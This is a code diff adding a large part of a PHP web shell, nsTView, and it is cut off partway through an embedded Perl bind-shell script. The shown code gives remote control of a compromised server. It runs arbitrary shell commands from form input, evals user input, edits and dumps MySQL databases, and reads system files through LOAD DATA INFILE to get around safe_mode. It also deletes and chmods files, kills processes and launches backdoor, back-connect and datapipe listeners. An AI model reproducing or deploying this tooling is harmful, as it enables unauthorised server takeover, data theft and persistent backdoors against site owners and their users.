+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
